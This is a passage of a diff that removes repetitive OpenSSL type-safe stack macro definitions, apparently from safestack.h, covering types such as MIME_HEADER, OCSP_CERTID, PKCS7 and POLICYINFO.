-#define sk_MEM_OBJECT_DATA_find_ex(st, val) SKM_sk_find_ex(MEM_OBJECT_DATA, (st), (val))
-#define sk_MEM_OBJECT_DATA_delete(st, i) SKM_sk_delete(MEM_OBJECT_DATA, (st), (i))
-#define sk_MEM_OBJECT_DATA_delete_ptr(st, ptr) SKM_sk_delete_ptr(MEM_OBJECT_DATA, (st), (ptr))
-#define sk_MEM_OBJECT_DATA_insert(st, val, i) SKM_sk_insert(MEM_OBJECT_DATA, (st), (val), (i))
-#define sk_MEM_OBJECT_DATA_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(MEM_OBJECT_DATA, (st), (cmp))
-#define sk_MEM_OBJECT_DATA_dup(st) SKM_sk_dup(MEM_OBJECT_DATA, st)
-#define sk_MEM_OBJECT_DATA_pop_free(st, free_func) SKM_sk_pop_free(MEM_OBJECT_DATA, (st), (free_func))
-#define sk_MEM_OBJECT_DATA_shift(st) SKM_sk_shift(MEM_OBJECT_DATA, (st))
-#define sk_MEM_OBJECT_DATA_pop(st) SKM_sk_pop(MEM_OBJECT_DATA, (st))
-#define sk_MEM_OBJECT_DATA_sort(st) SKM_sk_sort(MEM_OBJECT_DATA, (st))
-#define sk_MEM_OBJECT_DATA_is_sorted(st) SKM_sk_is_sorted(MEM_OBJECT_DATA, (st))
-
-#define sk_MIME_HEADER_new(cmp) SKM_sk_new(MIME_HEADER, (cmp))
-#define sk_MIME_HEADER_new_null() SKM_sk_new_null(MIME_HEADER)
-#define sk_MIME_HEADER_free(st) SKM_sk_free(MIME_HEADER, (st))
-#define sk_MIME_HEADER_num(st) SKM_sk_num(MIME_HEADER, (st))
-#define sk_MIME_HEADER_value(st, i) SKM_sk_value(MIME_HEADER, (st), (i))
-#define sk_MIME_HEADER_set(st, i, val) SKM_sk_set(MIME_HEADER, (st), (i), (val))
-#define sk_MIME_HEADER_zero(st) SKM_sk_zero(MIME_HEADER, (st))
-#define sk_MIME_HEADER_push(st, val) SKM_sk_push(MIME_HEADER, (st), (val))
-#define sk_MIME_HEADER_unshift(st, val) SKM_sk_unshift(MIME_HEADER, (st), (val))
-#define sk_MIME_HEADER_find(st, val) SKM_sk_find(MIME_HEADER, (st), (val))
-#define sk_MIME_HEADER_find_ex(st, val) SKM_sk_find_ex(MIME_HEADER, (st), (val))
-#define sk_MIME_HEADER_delete(st, i) SKM_sk_delete(MIME_HEADER, (st), (i))
-#define sk_MIME_HEADER_delete_ptr(st, ptr) SKM_sk_delete_ptr(MIME_HEADER, (st), (ptr))
-#define sk_MIME_HEADER_insert(st, val, i) SKM_sk_insert(MIME_HEADER, (st), (val), (i))
-#define sk_MIME_HEADER_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(MIME_HEADER, (st), (cmp))
-#define sk_MIME_HEADER_dup(st) SKM_sk_dup(MIME_HEADER, st)
-#define sk_MIME_HEADER_pop_free(st, free_func) SKM_sk_pop_free(MIME_HEADER, (st), (free_func))
-#define sk_MIME_HEADER_shift(st) SKM_sk_shift(MIME_HEADER, (st))
-#define sk_MIME_HEADER_pop(st) SKM_sk_pop(MIME_HEADER, (st))
-#define sk_MIME_HEADER_sort(st) SKM_sk_sort(MIME_HEADER, (st))
-#define sk_MIME_HEADER_is_sorted(st) SKM_sk_is_sorted(MIME_HEADER, (st))
-
-#define sk_MIME_PARAM_new(cmp) SKM_sk_new(MIME_PARAM, (cmp))
-#define sk_MIME_PARAM_new_null() SKM_sk_new_null(MIME_PARAM)
-#define sk_MIME_PARAM_free(st) SKM_sk_free(MIME_PARAM, (st))
-#define sk_MIME_PARAM_num(st) SKM_sk_num(MIME_PARAM, (st))
-#define sk_MIME_PARAM_value(st, i) SKM_sk_value(MIME_PARAM, (st), (i))
-#define sk_MIME_PARAM_set(st, i, val) SKM_sk_set(MIME_PARAM, (st), (i), (val))
-#define sk_MIME_PARAM_zero(st) SKM_sk_zero(MIME_PARAM, (st))
-#define sk_MIME_PARAM_push(st, val) SKM_sk_push(MIME_PARAM, (st), (val))
-#define sk_MIME_PARAM_unshift(st, val) SKM_sk_unshift(MIME_PARAM, (st), (val))
-#define sk_MIME_PARAM_find(st, val) SKM_sk_find(MIME_PARAM, (st), (val))
-#define sk_MIME_PARAM_find_ex(st, val) SKM_sk_find_ex(MIME_PARAM, (st), (val))
-#define sk_MIME_PARAM_delete(st, i) SKM_sk_delete(MIME_PARAM, (st), (i))
-#define sk_MIME_PARAM_delete_ptr(st, ptr) SKM_sk_delete_ptr(MIME_PARAM, (st), (ptr))
-#define sk_MIME_PARAM_insert(st, val, i) SKM_sk_insert(MIME_PARAM, (st), (val), (i))
-#define sk_MIME_PARAM_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(MIME_PARAM, (st), (cmp))
-#define sk_MIME_PARAM_dup(st) SKM_sk_dup(MIME_PARAM, st)
-#define sk_MIME_PARAM_pop_free(st, free_func) SKM_sk_pop_free(MIME_PARAM, (st), (free_func))
-#define sk_MIME_PARAM_shift(st) SKM_sk_shift(MIME_PARAM, (st))
-#define sk_MIME_PARAM_pop(st) SKM_sk_pop(MIME_PARAM, (st))
-#define sk_MIME_PARAM_sort(st) SKM_sk_sort(MIME_PARAM, (st))
-#define sk_MIME_PARAM_is_sorted(st) SKM_sk_is_sorted(MIME_PARAM, (st))
-
-#define sk_NAME_FUNCS_new(cmp) SKM_sk_new(NAME_FUNCS, (cmp))
-#define sk_NAME_FUNCS_new_null() SKM_sk_new_null(NAME_FUNCS)
-#define sk_NAME_FUNCS_free(st) SKM_sk_free(NAME_FUNCS, (st))
-#define sk_NAME_FUNCS_num(st) SKM_sk_num(NAME_FUNCS, (st))
-#define sk_NAME_FUNCS_value(st, i) SKM_sk_value(NAME_FUNCS, (st), (i))
-#define sk_NAME_FUNCS_set(st, i, val) SKM_sk_set(NAME_FUNCS, (st), (i), (val))
-#define sk_NAME_FUNCS_zero(st) SKM_sk_zero(NAME_FUNCS, (st))
-#define sk_NAME_FUNCS_push(st, val) SKM_sk_push(NAME_FUNCS, (st), (val))
-#define sk_NAME_FUNCS_unshift(st, val) SKM_sk_unshift(NAME_FUNCS, (st), (val))
-#define sk_NAME_FUNCS_find(st, val) SKM_sk_find(NAME_FUNCS, (st), (val))
-#define sk_NAME_FUNCS_find_ex(st, val) SKM_sk_find_ex(NAME_FUNCS, (st), (val))
-#define sk_NAME_FUNCS_delete(st, i) SKM_sk_delete(NAME_FUNCS, (st), (i))
-#define sk_NAME_FUNCS_delete_ptr(st, ptr) SKM_sk_delete_ptr(NAME_FUNCS, (st), (ptr))
-#define sk_NAME_FUNCS_insert(st, val, i) SKM_sk_insert(NAME_FUNCS, (st), (val), (i))
-#define sk_NAME_FUNCS_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(NAME_FUNCS, (st), (cmp))
-#define sk_NAME_FUNCS_dup(st) SKM_sk_dup(NAME_FUNCS, st)
-#define sk_NAME_FUNCS_pop_free(st, free_func) SKM_sk_pop_free(NAME_FUNCS, (st), (free_func))
-#define sk_NAME_FUNCS_shift(st) SKM_sk_shift(NAME_FUNCS, (st))
-#define sk_NAME_FUNCS_pop(st) SKM_sk_pop(NAME_FUNCS, (st))
-#define sk_NAME_FUNCS_sort(st) SKM_sk_sort(NAME_FUNCS, (st))
-#define sk_NAME_FUNCS_is_sorted(st) SKM_sk_is_sorted(NAME_FUNCS, (st))
-
-#define sk_OCSP_CERTID_new(cmp) SKM_sk_new(OCSP_CERTID, (cmp))
-#define sk_OCSP_CERTID_new_null() SKM_sk_new_null(OCSP_CERTID)
-#define sk_OCSP_CERTID_free(st) SKM_sk_free(OCSP_CERTID, (st))
-#define sk_OCSP_CERTID_num(st) SKM_sk_num(OCSP_CERTID, (st))
-#define sk_OCSP_CERTID_value(st, i) SKM_sk_value(OCSP_CERTID, (st), (i))
-#define sk_OCSP_CERTID_set(st, i, val) SKM_sk_set(OCSP_CERTID, (st), (i), (val))
-#define sk_OCSP_CERTID_zero(st) SKM_sk_zero(OCSP_CERTID, (st))
-#define sk_OCSP_CERTID_push(st, val) SKM_sk_push(OCSP_CERTID, (st), (val))
-#define sk_OCSP_CERTID_unshift(st, val) SKM_sk_unshift(OCSP_CERTID, (st), (val))
-#define sk_OCSP_CERTID_find(st, val) SKM_sk_find(OCSP_CERTID, (st), (val))
-#define sk_OCSP_CERTID_find_ex(st, val) SKM_sk_find_ex(OCSP_CERTID, (st), (val))
-#define sk_OCSP_CERTID_delete(st, i) SKM_sk_delete(OCSP_CERTID, (st), (i))
-#define sk_OCSP_CERTID_delete_ptr(st, ptr) SKM_sk_delete_ptr(OCSP_CERTID, (st), (ptr))
-#define sk_OCSP_CERTID_insert(st, val, i) SKM_sk_insert(OCSP_CERTID, (st), (val), (i))
-#define sk_OCSP_CERTID_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(OCSP_CERTID, (st), (cmp))
-#define sk_OCSP_CERTID_dup(st) SKM_sk_dup(OCSP_CERTID, st)
-#define sk_OCSP_CERTID_pop_free(st, free_func) SKM_sk_pop_free(OCSP_CERTID, (st), (free_func))
-#define sk_OCSP_CERTID_shift(st) SKM_sk_shift(OCSP_CERTID, (st))
-#define sk_OCSP_CERTID_pop(st) SKM_sk_pop(OCSP_CERTID, (st))
-#define sk_OCSP_CERTID_sort(st) SKM_sk_sort(OCSP_CERTID, (st))
-#define sk_OCSP_CERTID_is_sorted(st) SKM_sk_is_sorted(OCSP_CERTID, (st))
-
-#define sk_OCSP_ONEREQ_new(cmp) SKM_sk_new(OCSP_ONEREQ, (cmp))
-#define sk_OCSP_ONEREQ_new_null() SKM_sk_new_null(OCSP_ONEREQ)
-#define sk_OCSP_ONEREQ_free(st) SKM_sk_free(OCSP_ONEREQ, (st))
-#define sk_OCSP_ONEREQ_num(st) SKM_sk_num(OCSP_ONEREQ, (st))
-#define sk_OCSP_ONEREQ_value(st, i) SKM_sk_value(OCSP_ONEREQ, (st), (i))
-#define sk_OCSP_ONEREQ_set(st, i, val) SKM_sk_set(OCSP_ONEREQ, (st), (i), (val))
-#define sk_OCSP_ONEREQ_zero(st) SKM_sk_zero(OCSP_ONEREQ, (st))
-#define sk_OCSP_ONEREQ_push(st, val) SKM_sk_push(OCSP_ONEREQ, (st), (val))
-#define sk_OCSP_ONEREQ_unshift(st, val) SKM_sk_unshift(OCSP_ONEREQ, (st), (val))
-#define sk_OCSP_ONEREQ_find(st, val) SKM_sk_find(OCSP_ONEREQ, (st), (val))
-#define sk_OCSP_ONEREQ_find_ex(st, val) SKM_sk_find_ex(OCSP_ONEREQ, (st), (val))
-#define sk_OCSP_ONEREQ_delete(st, i) SKM_sk_delete(OCSP_ONEREQ, (st), (i))
-#define sk_OCSP_ONEREQ_delete_ptr(st, ptr) SKM_sk_delete_ptr(OCSP_ONEREQ, (st), (ptr))
-#define sk_OCSP_ONEREQ_insert(st, val, i) SKM_sk_insert(OCSP_ONEREQ, (st), (val), (i))
-#define sk_OCSP_ONEREQ_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(OCSP_ONEREQ, (st), (cmp))
-#define sk_OCSP_ONEREQ_dup(st) SKM_sk_dup(OCSP_ONEREQ, st)
-#define sk_OCSP_ONEREQ_pop_free(st, free_func) SKM_sk_pop_free(OCSP_ONEREQ, (st), (free_func))
-#define sk_OCSP_ONEREQ_shift(st) SKM_sk_shift(OCSP_ONEREQ, (st))
-#define sk_OCSP_ONEREQ_pop(st) SKM_sk_pop(OCSP_ONEREQ, (st))
-#define sk_OCSP_ONEREQ_sort(st) SKM_sk_sort(OCSP_ONEREQ, (st))
-#define sk_OCSP_ONEREQ_is_sorted(st) SKM_sk_is_sorted(OCSP_ONEREQ, (st))
-
-#define sk_OCSP_RESPID_new(cmp) SKM_sk_new(OCSP_RESPID, (cmp))
-#define sk_OCSP_RESPID_new_null() SKM_sk_new_null(OCSP_RESPID)
-#define sk_OCSP_RESPID_free(st) SKM_sk_free(OCSP_RESPID, (st))
-#define sk_OCSP_RESPID_num(st) SKM_sk_num(OCSP_RESPID, (st))
-#define sk_OCSP_RESPID_value(st, i) SKM_sk_value(OCSP_RESPID, (st), (i))
-#define sk_OCSP_RESPID_set(st, i, val) SKM_sk_set(OCSP_RESPID, (st), (i), (val))
-#define sk_OCSP_RESPID_zero(st) SKM_sk_zero(OCSP_RESPID, (st))
-#define sk_OCSP_RESPID_push(st, val) SKM_sk_push(OCSP_RESPID, (st), (val))
-#define sk_OCSP_RESPID_unshift(st, val) SKM_sk_unshift(OCSP_RESPID, (st), (val))
-#define sk_OCSP_RESPID_find(st, val) SKM_sk_find(OCSP_RESPID, (st), (val))
-#define sk_OCSP_RESPID_find_ex(st, val) SKM_sk_find_ex(OCSP_RESPID, (st), (val))
-#define sk_OCSP_RESPID_delete(st, i) SKM_sk_delete(OCSP_RESPID, (st), (i))
-#define sk_OCSP_RESPID_delete_ptr(st, ptr) SKM_sk_delete_ptr(OCSP_RESPID, (st), (ptr))
-#define sk_OCSP_RESPID_insert(st, val, i) SKM_sk_insert(OCSP_RESPID, (st), (val), (i))
-#define sk_OCSP_RESPID_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(OCSP_RESPID, (st), (cmp))
-#define sk_OCSP_RESPID_dup(st) SKM_sk_dup(OCSP_RESPID, st)
-#define sk_OCSP_RESPID_pop_free(st, free_func) SKM_sk_pop_free(OCSP_RESPID, (st), (free_func))
-#define sk_OCSP_RESPID_shift(st) SKM_sk_shift(OCSP_RESPID, (st))
-#define sk_OCSP_RESPID_pop(st) SKM_sk_pop(OCSP_RESPID, (st))
-#define sk_OCSP_RESPID_sort(st) SKM_sk_sort(OCSP_RESPID, (st))
-#define sk_OCSP_RESPID_is_sorted(st) SKM_sk_is_sorted(OCSP_RESPID, (st))
-
-#define sk_OCSP_SINGLERESP_new(cmp) SKM_sk_new(OCSP_SINGLERESP, (cmp))
-#define sk_OCSP_SINGLERESP_new_null() SKM_sk_new_null(OCSP_SINGLERESP)
-#define sk_OCSP_SINGLERESP_free(st) SKM_sk_free(OCSP_SINGLERESP, (st))
-#define sk_OCSP_SINGLERESP_num(st) SKM_sk_num(OCSP_SINGLERESP, (st))
-#define sk_OCSP_SINGLERESP_value(st, i) SKM_sk_value(OCSP_SINGLERESP, (st), (i))
-#define sk_OCSP_SINGLERESP_set(st, i, val) SKM_sk_set(OCSP_SINGLERESP, (st), (i), (val))
-#define sk_OCSP_SINGLERESP_zero(st) SKM_sk_zero(OCSP_SINGLERESP, (st))
-#define sk_OCSP_SINGLERESP_push(st, val) SKM_sk_push(OCSP_SINGLERESP, (st), (val))
-#define sk_OCSP_SINGLERESP_unshift(st, val) SKM_sk_unshift(OCSP_SINGLERESP, (st), (val))
-#define sk_OCSP_SINGLERESP_find(st, val) SKM_sk_find(OCSP_SINGLERESP, (st), (val))
-#define sk_OCSP_SINGLERESP_find_ex(st, val) SKM_sk_find_ex(OCSP_SINGLERESP, (st), (val))
-#define sk_OCSP_SINGLERESP_delete(st, i) SKM_sk_delete(OCSP_SINGLERESP, (st), (i))
-#define sk_OCSP_SINGLERESP_delete_ptr(st, ptr) SKM_sk_delete_ptr(OCSP_SINGLERESP, (st), (ptr))
-#define sk_OCSP_SINGLERESP_insert(st, val, i) SKM_sk_insert(OCSP_SINGLERESP, (st), (val), (i))
-#define sk_OCSP_SINGLERESP_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(OCSP_SINGLERESP, (st), (cmp))
-#define sk_OCSP_SINGLERESP_dup(st) SKM_sk_dup(OCSP_SINGLERESP, st)
-#define sk_OCSP_SINGLERESP_pop_free(st, free_func) SKM_sk_pop_free(OCSP_SINGLERESP, (st), (free_func))
-#define sk_OCSP_SINGLERESP_shift(st) SKM_sk_shift(OCSP_SINGLERESP, (st))
-#define sk_OCSP_SINGLERESP_pop(st) SKM_sk_pop(OCSP_SINGLERESP, (st))
-#define sk_OCSP_SINGLERESP_sort(st) SKM_sk_sort(OCSP_SINGLERESP, (st))
-#define sk_OCSP_SINGLERESP_is_sorted(st) SKM_sk_is_sorted(OCSP_SINGLERESP, (st))
-
-#define sk_PKCS12_SAFEBAG_new(cmp) SKM_sk_new(PKCS12_SAFEBAG, (cmp))
-#define sk_PKCS12_SAFEBAG_new_null() SKM_sk_new_null(PKCS12_SAFEBAG)
-#define sk_PKCS12_SAFEBAG_free(st) SKM_sk_free(PKCS12_SAFEBAG, (st))
-#define sk_PKCS12_SAFEBAG_num(st) SKM_sk_num(PKCS12_SAFEBAG, (st))
-#define sk_PKCS12_SAFEBAG_value(st, i) SKM_sk_value(PKCS12_SAFEBAG, (st), (i))
-#define sk_PKCS12_SAFEBAG_set(st, i, val) SKM_sk_set(PKCS12_SAFEBAG, (st), (i), (val))
-#define sk_PKCS12_SAFEBAG_zero(st) SKM_sk_zero(PKCS12_SAFEBAG, (st))
-#define sk_PKCS12_SAFEBAG_push(st, val) SKM_sk_push(PKCS12_SAFEBAG, (st), (val))
-#define sk_PKCS12_SAFEBAG_unshift(st, val) SKM_sk_unshift(PKCS12_SAFEBAG, (st), (val))
-#define sk_PKCS12_SAFEBAG_find(st, val) SKM_sk_find(PKCS12_SAFEBAG, (st), (val))
-#define sk_PKCS12_SAFEBAG_find_ex(st, val) SKM_sk_find_ex(PKCS12_SAFEBAG, (st), (val))
-#define sk_PKCS12_SAFEBAG_delete(st, i) SKM_sk_delete(PKCS12_SAFEBAG, (st), (i))
-#define sk_PKCS12_SAFEBAG_delete_ptr(st, ptr) SKM_sk_delete_ptr(PKCS12_SAFEBAG, (st), (ptr))
-#define sk_PKCS12_SAFEBAG_insert(st, val, i) SKM_sk_insert(PKCS12_SAFEBAG, (st), (val), (i))
-#define sk_PKCS12_SAFEBAG_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(PKCS12_SAFEBAG, (st), (cmp))
-#define sk_PKCS12_SAFEBAG_dup(st) SKM_sk_dup(PKCS12_SAFEBAG, st)
-#define sk_PKCS12_SAFEBAG_pop_free(st, free_func) SKM_sk_pop_free(PKCS12_SAFEBAG, (st), (free_func))
-#define sk_PKCS12_SAFEBAG_shift(st) SKM_sk_shift(PKCS12_SAFEBAG, (st))
-#define sk_PKCS12_SAFEBAG_pop(st) SKM_sk_pop(PKCS12_SAFEBAG, (st))
-#define sk_PKCS12_SAFEBAG_sort(st) SKM_sk_sort(PKCS12_SAFEBAG, (st))
-#define sk_PKCS12_SAFEBAG_is_sorted(st) SKM_sk_is_sorted(PKCS12_SAFEBAG, (st))
-
-#define sk_PKCS7_new(cmp) SKM_sk_new(PKCS7, (cmp))
-#define sk_PKCS7_new_null() SKM_sk_new_null(PKCS7)
-#define sk_PKCS7_free(st) SKM_sk_free(PKCS7, (st))
-#define sk_PKCS7_num(st) SKM_sk_num(PKCS7, (st))
-#define sk_PKCS7_value(st, i) SKM_sk_value(PKCS7, (st), (i))
-#define sk_PKCS7_set(st, i, val) SKM_sk_set(PKCS7, (st), (i), (val))
-#define sk_PKCS7_zero(st) SKM_sk_zero(PKCS7, (st))
-#define sk_PKCS7_push(st, val) SKM_sk_push(PKCS7, (st), (val))
-#define sk_PKCS7_unshift(st, val) SKM_sk_unshift(PKCS7, (st), (val))
-#define sk_PKCS7_find(st, val) SKM_sk_find(PKCS7, (st), (val))
-#define sk_PKCS7_find_ex(st, val) SKM_sk_find_ex(PKCS7, (st), (val))
-#define sk_PKCS7_delete(st, i) SKM_sk_delete(PKCS7, (st), (i))
-#define sk_PKCS7_delete_ptr(st, ptr) SKM_sk_delete_ptr(PKCS7, (st), (ptr))
-#define sk_PKCS7_insert(st, val, i) SKM_sk_insert(PKCS7, (st), (val), (i))
-#define sk_PKCS7_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(PKCS7, (st), (cmp))
-#define sk_PKCS7_dup(st) SKM_sk_dup(PKCS7, st)
-#define sk_PKCS7_pop_free(st, free_func) SKM_sk_pop_free(PKCS7, (st), (free_func))
-#define sk_PKCS7_shift(st) SKM_sk_shift(PKCS7, (st))
-#define sk_PKCS7_pop(st) SKM_sk_pop(PKCS7, (st))
-#define sk_PKCS7_sort(st) SKM_sk_sort(PKCS7, (st))
-#define sk_PKCS7_is_sorted(st) SKM_sk_is_sorted(PKCS7, (st))
-
-#define sk_PKCS7_RECIP_INFO_new(cmp) SKM_sk_new(PKCS7_RECIP_INFO, (cmp))
-#define sk_PKCS7_RECIP_INFO_new_null() SKM_sk_new_null(PKCS7_RECIP_INFO)
-#define sk_PKCS7_RECIP_INFO_free(st) SKM_sk_free(PKCS7_RECIP_INFO, (st))
-#define sk_PKCS7_RECIP_INFO_num(st) SKM_sk_num(PKCS7_RECIP_INFO, (st))
-#define sk_PKCS7_RECIP_INFO_value(st, i) SKM_sk_value(PKCS7_RECIP_INFO, (st), (i))
-#define sk_PKCS7_RECIP_INFO_set(st, i, val) SKM_sk_set(PKCS7_RECIP_INFO, (st), (i), (val))
-#define sk_PKCS7_RECIP_INFO_zero(st) SKM_sk_zero(PKCS7_RECIP_INFO, (st))
-#define sk_PKCS7_RECIP_INFO_push(st, val) SKM_sk_push(PKCS7_RECIP_INFO, (st), (val))
-#define sk_PKCS7_RECIP_INFO_unshift(st, val) SKM_sk_unshift(PKCS7_RECIP_INFO, (st), (val))
-#define sk_PKCS7_RECIP_INFO_find(st, val) SKM_sk_find(PKCS7_RECIP_INFO, (st), (val))
-#define sk_PKCS7_RECIP_INFO_find_ex(st, val) SKM_sk_find_ex(PKCS7_RECIP_INFO, (st), (val))
-#define sk_PKCS7_RECIP_INFO_delete(st, i) SKM_sk_delete(PKCS7_RECIP_INFO, (st), (i))
-#define sk_PKCS7_RECIP_INFO_delete_ptr(st, ptr) SKM_sk_delete_ptr(PKCS7_RECIP_INFO, (st), (ptr))
-#define sk_PKCS7_RECIP_INFO_insert(st, val, i) SKM_sk_insert(PKCS7_RECIP_INFO, (st), (val), (i))
-#define sk_PKCS7_RECIP_INFO_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(PKCS7_RECIP_INFO, (st), (cmp))
-#define sk_PKCS7_RECIP_INFO_dup(st) SKM_sk_dup(PKCS7_RECIP_INFO, st)
-#define sk_PKCS7_RECIP_INFO_pop_free(st, free_func) SKM_sk_pop_free(PKCS7_RECIP_INFO, (st), (free_func))
-#define sk_PKCS7_RECIP_INFO_shift(st) SKM_sk_shift(PKCS7_RECIP_INFO, (st))
-#define sk_PKCS7_RECIP_INFO_pop(st) SKM_sk_pop(PKCS7_RECIP_INFO, (st))
-#define sk_PKCS7_RECIP_INFO_sort(st) SKM_sk_sort(PKCS7_RECIP_INFO, (st))
-#define sk_PKCS7_RECIP_INFO_is_sorted(st) SKM_sk_is_sorted(PKCS7_RECIP_INFO, (st))
-
-#define sk_PKCS7_SIGNER_INFO_new(cmp) SKM_sk_new(PKCS7_SIGNER_INFO, (cmp))
-#define sk_PKCS7_SIGNER_INFO_new_null() SKM_sk_new_null(PKCS7_SIGNER_INFO)
-#define sk_PKCS7_SIGNER_INFO_free(st) SKM_sk_free(PKCS7_SIGNER_INFO, (st))
-#define sk_PKCS7_SIGNER_INFO_num(st) SKM_sk_num(PKCS7_SIGNER_INFO, (st))
-#define sk_PKCS7_SIGNER_INFO_value(st, i) SKM_sk_value(PKCS7_SIGNER_INFO, (st), (i))
-#define sk_PKCS7_SIGNER_INFO_set(st, i, val) SKM_sk_set(PKCS7_SIGNER_INFO, (st), (i), (val))
-#define sk_PKCS7_SIGNER_INFO_zero(st) SKM_sk_zero(PKCS7_SIGNER_INFO, (st))
-#define sk_PKCS7_SIGNER_INFO_push(st, val) SKM_sk_push(PKCS7_SIGNER_INFO, (st), (val))
-#define sk_PKCS7_SIGNER_INFO_unshift(st, val) SKM_sk_unshift(PKCS7_SIGNER_INFO, (st), (val))
-#define sk_PKCS7_SIGNER_INFO_find(st, val) SKM_sk_find(PKCS7_SIGNER_INFO, (st), (val))
-#define sk_PKCS7_SIGNER_INFO_find_ex(st, val) SKM_sk_find_ex(PKCS7_SIGNER_INFO, (st), (val))
-#define sk_PKCS7_SIGNER_INFO_delete(st, i) SKM_sk_delete(PKCS7_SIGNER_INFO, (st), (i))
-#define sk_PKCS7_SIGNER_INFO_delete_ptr(st, ptr) SKM_sk_delete_ptr(PKCS7_SIGNER_INFO, (st), (ptr))
-#define sk_PKCS7_SIGNER_INFO_insert(st, val, i) SKM_sk_insert(PKCS7_SIGNER_INFO, (st), (val), (i))
-#define sk_PKCS7_SIGNER_INFO_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(PKCS7_SIGNER_INFO, (st), (cmp))
-#define sk_PKCS7_SIGNER_INFO_dup(st) SKM_sk_dup(PKCS7_SIGNER_INFO, st)
-#define sk_PKCS7_SIGNER_INFO_pop_free(st, free_func) SKM_sk_pop_free(PKCS7_SIGNER_INFO, (st), (free_func))
-#define sk_PKCS7_SIGNER_INFO_shift(st) SKM_sk_shift(PKCS7_SIGNER_INFO, (st))
-#define sk_PKCS7_SIGNER_INFO_pop(st) SKM_sk_pop(PKCS7_SIGNER_INFO, (st))
-#define sk_PKCS7_SIGNER_INFO_sort(st) SKM_sk_sort(PKCS7_SIGNER_INFO, (st))
-#define sk_PKCS7_SIGNER_INFO_is_sorted(st) SKM_sk_is_sorted(PKCS7_SIGNER_INFO, (st))
-
-#define sk_POLICYINFO_new(cmp) SKM_sk_new(POLICYINFO, (cmp))
-#define sk_POLICYINFO_new_null() SKM_sk_new_null(POLICYINFO)
-#define sk_POLICYINFO_free(st) SKM_sk_free(POLICYINFO, (st))
-#define sk_POLICYINFO_num(st) SKM_sk_num(POLICYINFO, (st))
-#define sk_POLICYINFO_value(st, i) SKM_sk_value(POLICYINFO, (st), (i))
-#define sk_POLICYINFO_set(st, i, val) SKM_sk_set(POLICYINFO, (st), (i), (val))
-#define sk_POLICYINFO_zero(st) SKM_sk_zero(POLICYINFO, (st))
-#define sk_POLICYINFO_push(st, val) SKM_sk_push(POLICYINFO, (st), (val))
-#define sk_POLICYINFO_unshift(st, val) SKM_sk_unshift(POLICYINFO, (st), (val))
-#define sk_POLICYINFO_find(st, val) SKM_sk_find(POLICYINFO, (st), (val))
-#define sk_POLICYINFO_find_ex(st, val) SKM_sk_find_ex(POLICYINFO, (st), (val))
-#define sk_POLICYINFO_delete(st, i) SKM_sk_delete(POLICYINFO, (st), (i))
-#define sk_POLICYINFO_delete_ptr(st, ptr) SKM_sk_delete_ptr(POLICYINFO, (st), (ptr))
-#define sk_POLICYINFO_insert(st, val, i) SKM_sk_insert(POLICYINFO, (st), (val), (i))
-#define sk_POLICYINFO_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(POLICYINFO, (st), (cmp))
-#define sk_POLICYINFO_dup(st) SKM_sk_dup(POLICYINFO, st)
-#define sk_POLICYINFO_pop_free(st, free_func) SKM_sk_pop_free(POLICYINFO, (st), (free_func))
-#define sk_POLICYINFO_shift(st) SKM_sk_shift(POLICYINFO, (st))
-#define sk_POLICYINFO_pop(st) SKM_sk_pop(POLICYINFO, (st))
-#define sk_POLICYINFO_sort(st) SKM_sk_sort(POLICYINFO, (st))
-#define sk_POLICYINFO_is_sorted(st) SKM_sk_is_sorted(POLICYINFO, (st))
-
-#define sk_POLICYQUALINFO_new(cmp) SKM_sk_new(POLICYQUALINFO, (cmp))
-#define sk_POLICYQUALINFO_new_null() SKM_sk_new_null(POLICYQUALINFO)
-#define sk_POLICYQUALINFO_free(st) SKM_sk_free(POLICYQUALINFO, (st))
-#define sk_POLICYQUALINFO_num(st) SKM_sk_num(POLICYQUALINFO, (st))
-#define sk_POLICYQUALINFO_value(st, i) SKM_sk_value(POLICYQUALINFO, (st), (i))
-#define sk_POLICYQUALINFO_set(st, i, val) SKM_sk_set(POLICYQUALINFO, (st), (i), (val))
-#define sk_POLICYQUALINFO_zero(st) SKM_sk_zero(POLICYQUALINFO, (st))
-#define sk_POLICYQUALINFO_push(st, val) SKM_sk_push(POLICYQUALINFO, (st), (val))
-#define sk_POLICYQUALINFO_unshift(st, val) SKM_sk_unshift(POLICYQUALINFO, (st), (val))
-#define sk_POLICYQUALINFO_find(st, val) SKM_sk_find(POLICYQUALINFO, (st), (val))
-#define sk_POLICYQUALINFO_find_ex(st, val) SKM_sk_find_ex(POLICYQUALINFO, (st), (val))
-#define sk_POLICYQUALINFO_delete(st, i) SKM_sk_delete(POLICYQUALINFO, (st), (i))
-#define sk_POLICYQUALINFO_delete_ptr(st, ptr) SKM_sk_delete_ptr(POLICYQUALINFO, (st), (ptr))
-#define sk_POLICYQUALINFO_insert(st, val, i) SKM_sk_insert(POLICYQUALINFO, (st), (val), (i))
-#define sk_POLICYQUALINFO_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(POLICYQUALINFO, (st), (cmp))
-#define sk_POLICYQUALINFO_dup(st) SKM_sk_dup(POLICYQUALINFO, st)
-#define sk_POLICYQUALINFO_pop_free(st, free_func) SKM_sk_pop_free(POLICYQUALINFO, (st), (free_func))
-#define sk_POLICYQUALINFO_shift(st) SKM_sk_shift(POLICYQUALINFO, (st))
-#define sk_POLICYQUALINFO_pop(st) SKM_sk_pop(POLICYQUALINFO, (st))
-#define sk_POLICYQUALINFO_sort(st) SKM_sk_sort(POLICYQUALINFO, (st))
-#define sk_POLICYQUALINFO_is_sorted(st) SKM_sk_is_sorted(POLICYQUALINFO, (st))
-
-#define sk_POLICY_MAPPING_new(cmp) SKM_sk_new(POLICY_MAPPING, (cmp))
-#define sk_POLICY_MAPPING_new_null() SKM_sk_new_null(POLICY_MAPPING)
-#define sk_POLICY_MAPPING_free(st) SKM_sk_free(POLICY_MAPPING, (st))
-#define sk_POLICY_MAPPING_num(st) SKM_sk_num(POLICY_MAPPING, (st))
